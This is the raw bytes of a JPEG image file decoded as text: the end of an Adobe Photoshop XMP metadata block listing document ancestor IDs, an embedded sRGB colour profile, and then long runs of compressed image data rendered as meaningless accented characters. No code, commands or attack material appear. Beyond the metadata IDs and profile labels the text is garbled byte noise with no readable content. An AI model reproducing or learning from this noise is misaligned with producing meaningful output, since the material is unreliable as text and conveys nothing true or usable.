</xmpMM:History> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stRef:documentID="adobe:docid:photoshop:7dbf3126-d713-a744-8bcc-86ce4a28f7ad" stRef:originalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00"/> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>130277488</rdf:li> <rdf:li>141194698</rdf:li> <rdf:li>145150258</rdf:li> <rdf:li>167191953</rdf:li> <rdf:li>176341593</rdf:li> <rdf:li>178977234</rdf:li> <rdf:li>182272822</rdf:li> <rdf:li>192261204</rdf:li> <rdf:li>193438474</rdf:li> <rdf:li>195689250</rdf:li> <rdf:li>196294602</rdf:li> <rdf:li>228083377</rdf:li> <rdf:li>242265558</rdf:li> <rdf:li>3C195ED08DD181C1E70D74058088D923</rdf:li> <rdf:li>51124270</rdf:li> <rdf:li>55EBD6896B155197C00F14AE15DD5833</rdf:li> <rdf:li>6A0A15811A8FC9AC3A16B564BD642F8C</rdf:li> <rdf:li>73579908</rdf:li> <rdf:li>786951C7142A2AEC38D5A5004E40A752</rdf:li> <rdf:li>85C0BB87BEAE9829B22F9F7DDC288118</rdf:li> <rdf:li>98849039</rdf:li> <rdf:li>A5AC77993D83A50F34AA7C4E8A6D5DC7</rdf:li> <rdf:li>F33669D08BFCBD95F06E1D6DC8085223</rdf:li> <rdf:li>adobe:docid:photoshop:2aadf570-db10-11e5-8cd7-df40e3f5c0ff</rdf:li> <rdf:li>adobe:docid:photoshop:3ad2bde0-36da-11e5-aba8-c6c7ea128f87</rdf:li> <rdf:li>adobe:docid:photoshop:3ae55549-2f11-11e5-8a1e-cca3aa3b1f5b</rdf:li> <rdf:li>adobe:docid:photoshop:46ec2593-3be2-11e5-a44f-893b6bacb806</rdf:li> <rdf:li>adobe:docid:photoshop:59185ead-ccc4-1179-9470-fe1407c09860</rdf:li> <rdf:li>adobe:docid:photoshop:5d4ca717-565e-11e5-83d9-96afab01fb7d</rdf:li> <rdf:li>adobe:docid:photoshop:7e1015e9-5bcf-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:7f36621b-addc-11e7-aea5-b4dbe1565c8e</rdf:li> <rdf:li>adobe:docid:photoshop:9510e559-2cae-11e5-a749-d8deb76636bb</rdf:li> <rdf:li>adobe:docid:photoshop:99221731-5be2-294d-9926-ec33347c3f79</rdf:li> <rdf:li>adobe:docid:photoshop:a1d8d42c-8aec-117a-9ce0-d85f44e8821b</rdf:li> <rdf:li>adobe:docid:photoshop:d04f7fa4-5c13-11e5-82d7-b1b6eadfc164</rdf:li> <rdf:li>adobe:docid:photoshop:df2f204d-b651-11e5-bb8e-99bbec9e1c45</rdf:li> <rdf:li>adobe:docid:photoshop:f188381e-5d62-11e5-a1c8-dc3a58737c37</rdf:li> <rdf:li>uuid:2CDD2D0EC944DF11BBB8F27D9F6841CA</rdf:li> <rdf:li>uuid:D670922B660CE611ADAB93AF422C66D6</rdf:li> <rdf:li>xmp.did:0093BA7511206811B1DAAEADD64F896A</rdf:li> <rdf:li>xmp.did:018011740720681180E5B75AA0F739E5</rdf:li> <rdf:li>xmp.did:0180117407206811871F80FDF2C3718E</rdf:li> <rdf:li>xmp.did:0180117407206811871FB6C01BE9F510</rdf:li> <rdf:li>xmp.did:0180117407206811871FBEC38D9105D7</rdf:li> <rdf:li>xmp.did:0180117407206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:0180117407206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:018011740720681188C683EA16CE491B</rdf:li> <rdf:li>xmp.did:018011740720681188C68D0E9FB08CA5</rdf:li> <rdf:li>xmp.did:018011740720681188C6C87AF92C64EF</rdf:li> <rdf:li>xmp.did:018011740720681192B0CDEAE74D693B</rdf:li> <rdf:li>xmp.did:028011740720681188C6AF0A6F7FE824</rdf:li> <rdf:li>xmp.did:028011740720681188C6C6A97910AC78</rdf:li> <rdf:li>xmp.did:0380117407206811871FB2718E5E8603</rdf:li> <rdf:li>xmp.did:03801174072068119109CACE15827097</rdf:li> <rdf:li>xmp.did:038011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:0480117407206811822AFC40E69A57D6</rdf:li> <rdf:li>xmp.did:04801174072068118C148D3FFC44F7CF</rdf:li> <rdf:li>xmp.did:0580117407206811871FF2DFC48F728E</rdf:li> <rdf:li>xmp.did:05801174072068118A6DDFE128CA40E1</rdf:li> <rdf:li>xmp.did:05801174072068118A6DF5A37A7EB4B7</rdf:li> <rdf:li>xmp.did:0680117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0680117407206811871FD9ADEBC05AC9</rdf:li> <rdf:li>xmp.did:0680117407206811BAA9C90DDE484AC6</rdf:li> <rdf:li>xmp.did:078011740720681192B0B2B684AE331D</rdf:li> <rdf:li>xmp.did:08801174072068118C14A81E3999D0D0</rdf:li> <rdf:li>xmp.did:0881930D1920681188C6B23E0DA3D9CA</rdf:li> <rdf:li>xmp.did:098011740720681188C6A094D1E6A3F9</rdf:li> <rdf:li>xmp.did:0A80117407206811871FC7F631C08A65</rdf:li> <rdf:li>xmp.did:0A80117407206811871FD969D92FB0E5</rdf:li> <rdf:li>xmp.did:0A8011740720681188C6D7A592EC9D69</rdf:li> <rdf:li>xmp.did:0A8011740720681192B0EAE56F792B85</rdf:li> <rdf:li>xmp.did:0e6875b8-543f-734c-9035-4a17948bcd0b</rdf:li> <rdf:li>xmp.did:131A06DA1020681188C69193806B1932</rdf:li> <rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðô½ÚßÔ{öª:
          ¥Ø;g/‘›ˆqi‘Ž“+=¾¿o‹È
          L„ú:#k~}£¹Ú÷E/qg"§­*?h¨þ}h£+ЩíUëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ê¶¾cüªÊíúž§ë\‹có‘Á÷¿tQÉjÌOÝD²ÅƒÃN¼ÓdššEzŠ•õÀR2²ë1¹o`Žáp¾JÅ^Å<
          ?zŠð|N8½uînTäÓMS4µËQQ<4óÍ#Ë4ÒÈÅä–Y\³É$ŽIf$’MϹ ¥b÷¾½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ê£­õï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uÉãt’7h䍕Ñъº:ÊèÊC++‚9߉Pðë]Z?œ¦cԝ›”—)&BÔ»/td%2d
          j)1mìÍ\„½wÞ*‘IQ!3y­òGãó&ÁFû…Ši¦]G
          *yŽÎ(jđþ%êÑ=:c¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¨õU	IKSU %) š¡Àú”†6‘€úóe÷µ™Tq'¯u¬~=_¹s¹Å–ª2™Ü¥~_!;j&Z̍Tµu/ÍÈYM‡àqîp†QC¤h °
          —pë/”ÍÖGŽÂãr|„«#ÅC‹¢©ÈVJ±#I+GKI³ºÇ–bÙA'vv®§p«êM[ãÃ¥Oú2ìŸù÷›çÿAÁÿÖÿm}M·ü¤Gþô?ÏÖè}^ÿF]“ÿ>ó|ÿè#¸?úßïßSmÿ)ÿ½óõêC׿їdÿϼß?úîþ·û÷ÔÛÊDïCüýz‡Ðõ×ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	